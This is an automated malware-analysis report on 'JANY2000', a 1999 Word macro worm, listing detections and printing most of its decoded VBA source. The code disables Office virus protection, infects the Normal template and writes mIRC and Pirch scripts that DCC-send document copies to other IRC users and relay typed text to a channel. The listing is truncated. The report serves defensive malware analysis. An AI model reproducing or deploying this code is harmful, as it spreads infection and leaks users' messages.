MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to export its own code as 'C:\JANY2000.dll' and then import it into the Normal template or active document. It also attempts to save multiple files with potentially sensitive names like 'PASSWORDS.doc' and 'JANY_is_cute.doc' to the C:\Windows directory. This behavior suggests the macro is designed to establish persistence or drop additional malicious components.
Heuristics 5
-
ClamAV: Win.Trojan.U-74 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.U-74
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7122 bytes |
SHA-256: cb859865cc95d289dd45ccfb02f4a3af277d4064fcb71ef02c7bee36ddb357af |
|||
|
Detection
ClamAV:
Win.Trojan.U-74
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JANY_2000"
'V_Name = [JANY2000]
'Author = [Del_Armg0]
'Date = [14nov99]
'Type = [W97MacroVirus/Mirc_Pirch_Worm/NoDestructor!/AndAlwaysForAGirl;)]
'GreetZ = [Jany, Secret aka Stram ! ;), Phage, all_on_#vxtrader&vx-vtc, Fa, Elsa, Soph&Franck, &marie42_]
'Disclaim=[JE L'AIME TOUTE ENTIERE... SIMPLEMENT]
Sub AutoOpen()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JANY_2000").Export ("C:\JANY2000.dll")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JANY_2000" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JANY_2000" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set Jany = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set Jany = ActiveDocument.VBProject
Jany.VBComponents.Import ("C:\JANY2000.dll")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY_is_cute.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY_is_Sweet.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\PASSWORDS.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY2000.doc", FileFormat:=wdFormatDocument
Kill "C:\mirc\Script.ini"
Open "C:\mirc\Script.ini" For Output As #2
Print #2, "[SCRIPT]"
Print #2, "n0=on 1:start:{"
Print #2, "n1= .remote on"
Print #2, "n2= .ctcps on"
Print #2, "n3= .events on"
Print #2, "n4= }"
Print #2, "n5=on 1:join:#:{"
Print #2, "n6=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\PASSWORDS.doc"
Print #2, "n7= }"
Print #2, "n8=on 1:input:*:.msg #Jany2000 [( $+ $active $+ ) $1-]"
Print #2, "n9=on 1:text:*:?:.msg #Jany2000 [( $+ $active $+ ) $1-]"
Print #2, "n10=on 1:FILESENT:*.*:/dcc send $nick C:\Windows\JANY_is_cute.doc"
Print #2, "n10=on 1:FILERCVD:*.*:/dcc send $nick C:\Windows\JANY_is_Sweet.doc"
Print #2, "n11=on 1:connect:.msg #Jany2000 HI!!! Une Jany Virtuelle, c deja ca!!! ;)"
Print #2, ";A Del_Armg0 Script 4 Jany"
Close #2
Kill "C:\Windows\eventss.vxd"
Open "C:\Windows\eventss.vxd" For Output As #3
Print #3, "[Levels]"
Print #3, "Enabled=1"
Print #3, "Count=1"
Print #3, "Level1=000-Unknowns"""
Print #3, "000-UnknownsEnabled=1"
Print #3, ""
Print #3, "[000-Unknowns]"
Print #3, "User1=*!*@*"
Print #3, "UserCount=1"
Print #3, "Event1=;A Del_Armg0 Ripped! Script 4 Jany"
Print #3, "Event2=ON JOIN:#:/dcc send $nick C:\Windows\PASSWORDS.doc"
Print #3, "Event3=ON PART:#:/dcc send $nick C:\Windows\JANY2000.doc"
Print #3, "EventCount=3"
Close #3
Kill "C:\pirch98\events.ini"
Kill "C:\pirch32\events.ini"
SourceFile = "C:\Windows\eventss.vxd"
DestinationFile = "C:\pirch98\events.ini"
FileCopy SourceFile, DestinationFile
SourceFilez = "C:\Windows\eventss.vxd"
DestinationFilez = "C:\pirch32\events.ini"
FileCopy SourceFilez, DestinationFilez
If Day(Now()) = 8 And Month(Now()) = 11 Then
MsgBox "Lorsque tout me ravit, J'ignore" & Chr(13) & Chr(10) & "Si quelque chose me seduit." & Chr(13) & Chr(10) & "Elle eblouit comme l'Aurore" & Chr(13) & Chr(10) & "Et console comme la Nuit;", "JANY2000"
End If
If Day(Now()) = 15 And Month(Now()) = 5 Then
MsgBox "Et l'harmonie est trop exquise," & Chr(13) & Chr(10) & "Qui gouverne tout son beau corps," & Chr(13) & Chr(10) & "Pour que l'impuissante analyse" & Chr(13) & Chr(10) & "En note les nombreux accords.", "JANY2000"
End If
If Day(Now()) = 31 And Month(Now()) = 12 Then
MsgBox "WAAA!!! YEAR2000 Tomorrow!!! Great no?
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.